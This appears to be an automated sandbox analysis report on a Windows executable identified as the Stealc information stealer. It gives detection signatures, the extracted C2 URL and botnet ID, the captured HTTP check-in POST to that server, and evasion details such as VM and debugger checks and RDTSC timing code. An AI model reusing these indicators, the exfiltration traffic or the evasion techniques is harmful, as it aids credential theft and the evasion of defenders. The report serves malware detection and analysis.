
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1521649
MD5: 4d54b2279d2b7ca76fdaf6d89c509355
SHA1: 379684bc91685997bfe8fba6a15212f925c7cafe
SHA256: 65055a6af994e27432e1bb9ced6fcb0886680b9f5a1a715d32d98341203cb7cc
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 4D54B2279D2B7CA76FDAF6D89C509355)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Yara matches in network traffic:
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security

Yara matches in process memory dumps:
Source: 00000000.00000003.1255957657.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 6672 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 6672 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

Yara matches in unpacked PE files:
Source: 0.2.file.exe.a70000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

No Sigma rule has matched

Suricata IDS alert:
Timestamp: 2024-09-29T01:36:06.027240+0200 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.7 | Source Port: 49699 | Destination IP: 185.215.113.37 | Destination Port: 80 | Protocol: TCP

                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.a70000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: file.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7C820 lstrlen, CryptStringToBinaryA, lstrcat, lstrcat, lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A79AC0 CryptStringToBinaryA, LocalAlloc, CryptStringToBinaryA, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A77240 GetProcessHeap, RtlAllocateHeap, CryptUnprotectData, WideCharToMultiByte, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A79B60 CryptUnprotectData, LocalAlloc, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A88EA0 CryptBinaryToStringA, GetProcessHeap, RtlAllocateHeap, CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A838B0 wsprintfA, FindFirstFileA, lstrcat, StrCmpCA, StrCmpCA, wsprintfA, PathMatchSpecA, CoInitialize, CoUninitialize, lstrcat, lstrlen, StrCmpCA, wsprintfA, wsprintfA, PathMatchSpecA, wsprintfA, CopyFileA, __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A84910 wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, wsprintfA, StrCmpCA, wsprintfA, wsprintfA, PathMatchSpecA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7DA80 FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7E430 FindFirstFileA, StrCmpCA, StrCmpCA, FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7ED20 wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, lstrlen, DeleteFileA, CopyFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A84570 GetProcessHeap, RtlAllocateHeap, wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, wsprintfA, CopyFileA, DeleteFileA, FindNextFileA, FindClose, lstrcat, lstrcat, lstrlen, lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A83EA0 wsprintfA, FindFirstFileA, StrCmpCA, StrCmpCA, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, lstrcat, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7F6B0 FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A716D0 FindFirstFileA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7DE10 FindFirstFileA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, FindNextFileA, FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7BE70 FindFirstFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, DeleteFileA, StrCmpCA, StrCmpCA, StrCmpCA, StrCmpCA, CopyFileA, StrCmpCA, DeleteFileA, StrCmpCA, FindNextFileA, FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49699 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDB
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data (multipart body, decoded from the captured raw bytes):
  ------JJJJDAAECGHDGDGCGHDB
  Content-Disposition: form-data; name="hwid"

  8E05906BE0482604982160
  ------JJJJDAAECGHDGDGCGHDB
  Content-Disposition: form-data; name="build"

  save
  ------JJJJDAAECGHDGDGCGHDB--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A76280 InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 (same request as the GET listed above: Host: 185.215.113.37, Connection: Keep-Alive, Cache-Control: no-cache)
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same headers and multipart body as the POST listed above: hwid=8E05906BE0482604982160, build=save)
Source: file.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1297365011.00000000006C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1297365011.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1297365011.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1297365011.00000000006E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&f&f
Source: file.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpVe
Source: file.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpfeV
Source: file.exe, 00000000.00000002.1297365011.00000000006C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/t
Source: file.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37w

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC5881
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4589D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E49009
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DD79A5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D0B34D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E3D4C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D9AC80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D4F4BD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4748A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D80C5F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E32C3E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DAC598
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D38DA2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E3AD7B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E43ED7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E3B7CA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3BF5E
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00A745C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: spyqlfjc ZLIB complexity 0.9948946083080424
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A88680 CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A83720 CoCreateInstance, MultiByteToWideChar, lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\85FG4Z8A.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 47%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1843712 > 1048576
Source: file.exe | Static PE information: Raw size of spyqlfjc is bigger than: 0x100000 < 0x19be00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.a70000.0.unpack :EW; .rsrc :W; .idata :W; :EW; spyqlfjc :EW; scxfhudm :EW; .taggant :EW; vs :ER; .rsrc :W; .idata :W; :EW; spyqlfjc :EW; scxfhudm :EW; .taggant :EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A89860 GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cb7f9 should be: 0x1d1f25
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: spyqlfjc
Source: file.exe | Static PE information: section name: scxfhudm
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB18A5 push 7554E71Dh; mov dword ptr [esp], ebp at 0_2_00EB18D1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E73085 push 48E573A7h; mov dword ptr [esp], eax at 0_2_00E730D3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA6888 push esi; mov dword ptr [esp], 7FA46EEFh at 0_2_00EA68F7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC5881 push ecx; mov dword ptr [esp], ebp at 0_2_00EC5886
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC5881 push ebx; mov dword ptr [esp], 4653060Eh at 0_2_00EC5937
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC5881 push 5B2DA72Ch; mov dword ptr [esp], ecx at 0_2_00EC59F6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push 123E554Eh; mov dword ptr [esp], ebp at 0_2_00E408AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push 69519E96h; mov dword ptr [esp], ecx at 0_2_00E408ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push 015A37A8h; mov dword ptr [esp], edx at 0_2_00E40930
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push 587C0597h; mov dword ptr [esp], ebp at 0_2_00E4095F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push ebx; mov dword ptr [esp], 52604D79h at 0_2_00E409EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push ecx; mov dword ptr [esp], ebx at 0_2_00E40A09
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push eax; mov dword ptr [esp], esp at 0_2_00E40A34
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push 348F6A11h; mov dword ptr [esp], edi at 0_2_00E40A5F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push edi; mov dword ptr [esp], esi at 0_2_00E40A63
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push esi; mov dword ptr [esp], 70FBD093h at 0_2_00E40A67
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push 1A7E5EB3h; mov dword ptr [esp], ebx at 0_2_00E40AD0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push ebx; mov dword ptr [esp], 06924D9Ah at 0_2_00E40AF7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push 2F289914h; mov dword ptr [esp], eax at 0_2_00E40B87
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push ecx; mov dword ptr [esp], 7AFE97C0h at 0_2_00E40BD7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push 631FD63Fh; mov dword ptr [esp], edi at 0_2_00E40BE4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push esi; mov dword ptr [esp], 5FAFD5F1h at 0_2_00E40C0E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push eax; mov dword ptr [esp], esi at 0_2_00E40CE7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push 73CA8B03h; mov dword ptr [esp], edi at 0_2_00E40CF5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push ecx; mov dword ptr [esp], eax at 0_2_00E40D16
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push 21564260h; mov dword ptr [esp], ebx at 0_2_00E40D1E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push eax; mov dword ptr [esp], esp at 0_2_00E40DE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push eax; mov dword ptr [esp], 6BFFA4E3h at 0_2_00E40F0F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push ebx; mov dword ptr [esp], edx at 0_2_00E40FCD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push eax; mov dword ptr [esp], edi at 0_2_00E41055
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E40895 push eax; mov dword ptr [esp], ebp at 0_2_00E41074
Source: file.exe | Static PE information: section name: spyqlfjc entropy: 7.9536919163300555

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A89860 GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13600)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CD1748, second address: CD174C, instructions:
  0x00000000 rdtsc
  0x00000002 pop edx
  0x00000003 pop eax
  0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CD174C, second address: CD1768, instructions:
  0x00000000 rdtsc
  0x00000002 jmp 00007F5408C21112h
  0x00000007 pop edx
  0x00000008 pop eax
  0x00000009 pop eax
  0x0000000a push eax
  0x0000000b push edi
  0x0000000c pushad
  0x0000000d push eax
  0x0000000e push edx
  0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E4DFC8, second address: E4DFDB, instructions:
  0x00000000 rdtsc
  0x00000002 pushad
  0x00000003 jo 00007F5408F96886h
  0x00000009 pushad
  0x0000000a popad
  0x0000000b jp 00007F5408F96886h
  0x00000011 push eax
  0x00000012 push edx
  0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E453DE, second address: E453E2, instructions:
  0x00000000 rdtsc
  0x00000002 pop edx
  0x00000003 pop eax
  0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E453E2, second address: E45418, instructions:
  0x00000000 rdtsc
  0x00000002 pushad
  0x00000003 popad
  0x00000004 jmp 00007F5408F96895h
  0x00000009 pop edx
  0x0000000a pop eax
  0x0000000b pushad
  0x0000000c pushad
  0x0000000d popad
  0x0000000e jmp 00007F5408F96890h
  0x00000013 push esi
  0x00000014 pop esi
  0x00000015 popad
  0x00000016 push edx
  0x00000017 pushad
  0x00000018 popad
  0x00000019 push eax
  0x0000001a push edx
  0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E4D0DB, second address: E4D0E1, instructions:
  0x00000000 rdtsc
  0x00000002 pop edx
  0x00000003 pop eax
  0x00000004 push eax
  0x00000005 push edx
  0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E4D62D, second address: E4D631, instructions:
  0x00000000 rdtsc
  0x00000002 pop edx
  0x00000003 pop eax
  0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E4D631, second address: E4D64F, instructions:
  0x00000000 rdtsc
  0x00000002 jmp 00007F5408C21117h
  0x00000007 pop edx
  0x00000008 pop eax
  0x00000009 pushad
  0x0000000a push eax
  0x0000000b push edx
  0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E4D81D, second address: E4D84C, instructions:
  0x00000000 rdtsc
  0x00000002 jmp 00007F5408F96891h
  0x00000007 push eax
  0x00000008 push edx
  0x00000009 jmp 00007F5408F9688Dh
  0x0000000e jmp 00007F5408F9688Dh
  0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E507DB, second address: E507E1, instructions:
  0x00000000 rdtsc
  0x00000002 pop edx
  0x00000003 pop eax
  0x00000004 push eax
  0x00000005 push edx
  0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E5093D, second address: E50941, instructions:
  0x00000000 rdtsc
  0x00000002 push eax
  0x00000003 push edx
  0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E50941, second address: E5094B, instructions:
  0x00000000 rdtsc
  0x00000002 pop edx
  0x00000003 pop eax
  0x00000004 pop edx
  0x00000005 pop eax
  0x00000006 push eax
  0x00000007 push edx
  0x00000008 pushad
  0x00000009 popad
  0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E509F2, second address: E50A0C, instructions:
  0x00000000 rdtsc
  0x00000002 jmp 00007F5408F9688Bh
  0x00000007 pop edx
  0x00000008 pop eax
  0x00000009 push eax
  0x0000000a push eax
  0x0000000b push edx
  0x0000000c push eax
  0x0000000d push edx
  0x0000000e jnl 00007F5408F96886h
  0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E50A0C, second address: E50A24, instructions:
  0x00000000 rdtsc
  0x00000002 jmp 00007F5408C21114h
  0x00000007 pop edx
  0x00000008 pop eax
  0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E50A24, second address: E50A29, instructions:
  0x00000000 rdtsc
  0x00000002 pushad
  0x00000003 push eax
  0x00000004 push edx
  0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E50A29, second address: E50A2F, instructions:
  0x00000000 rdtsc
  0x00000002 pop edx
  0x00000003 pop eax
  0x00000004 push eax
  0x00000005 push edx
  0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E50A2F, second address: E50A57, instructions:
  0x00000000 rdtsc
  0x00000002 pop edx
  0x00000003 pop eax
  0x00000004 popad
  0x00000005 pop edx
  0x00000006 pop eax
  0x00000007 nop
  0x00000008 sub edx, 01146E92h
  0x0000000e push 00000000h
  0x00000010 sub dword ptr [ebp+122D1DC4h], edi
  0x00000016 push 936BD181h
  0x0000001b push eax
  0x0000001c push edx
  0x0000001d jmp 00007F5408F9688Bh
  0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E50A57, second address: E50A5D, instructions:
  0x00000000 rdtsc
  0x00000002 push eax
  0x00000003 push edx
  0x00000004 push edi
  0x00000005 pop edi
  0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E50AEF, second address: E50B4B, instructions:
  0x00000000 rdtsc
  0x00000002 jmp 00007F5408F96895h
  0x00000007 pop edx
  0x00000008 pop eax
  0x00000009 add dword ptr [esp], 1ACACF1Ah
  0x00000010 mov dword ptr [ebp+122D1C2Ch], ebx
  0x00000016 lea ebx, dword ptr [ebp+12452568h]
  0x0000001c push 00000000h
  0x0000001e push ebp
  0x0000001f call 00007F5408F96888h
  0x00000024 pop ebp
  0x00000025 mov dword ptr [esp+04h], ebp
  0x00000029 add dword ptr [esp+04h], 00000017h
  0x00000031 inc ebp
  0x00000032 push ebp
  0x00000033 ret
  0x00000034 pop ebp
  0x00000035 ret
  0x00000036 adc dx, A8C0h
  0x0000003b cmc
  0x0000003c xchg eax, ebx
  0x0000003d push eax
  0x0000003e push edx
  0x0000003f jg 00007F5408F96888h
  0x00000045 pushad
  0x00000046 popad
  0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: E50B4B, second address: E50B6C, instructions:
  0x00000000 rdtsc
  0x00000002 jng 00007F5408C21108h
  0x00000008 pop edx
  0x00000009 pop eax
  0x0000000a push eax
  0x0000000b push eax
  0x0000000c push edx
  0x0000000d jc 00007F5408C21112h
  0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50B6C second address: E50B72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
